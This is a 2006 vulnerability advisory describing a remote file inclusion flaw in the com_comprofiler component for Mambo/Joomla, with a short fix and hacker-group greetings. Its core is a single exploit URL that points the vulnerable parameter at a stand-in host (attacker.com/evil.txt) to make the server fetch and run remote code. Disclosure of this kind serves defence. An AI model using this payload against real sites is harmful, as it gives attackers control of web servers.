|
|
---------------------------------------------------------------------------=0D
Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities=0D
---------------------------------------------------------------------------=0D
=0D
Author : Matdhule=0D
Date : August, 25th 2006=0D
Location : Indonesia, Jakarta=0D
Critical Lvl : Highly critical=0D
Impact : System access=0D
Where : From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
=0D
com_comprofiler Components=0D
=0D
Application : com_comprofiler=0D
version : 1.0 RC 2=0D
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~~=0D
=0D
in folder com_comprofiler we found vulnerability script plugin.class.php=0D
=0D
-----------------------plugin.class.php----------------------=0D
http://[target]/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= http://attacker.com/evil.txt?=0D
=0D
Solution:=0D
~~~~~~~~=0D
=0D
sanitize variabel $mosConfig_absolute_path in plugin.class.php=0D
=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~=0D
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)=0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous=0D
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama=0D
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com=0D
~ #nyubi (solpotcrew comunity) #jambihackerlink #e-c-h-o @ irc.dal.net=0D
---------------------------------------------------------------------------=0D
Contact:=0D
~~~~~~~=0D
=0D
matdhule[at]gmail[dot]com=0D
=0D
-------------------------------- [ EOF ] ----------------------------------=0D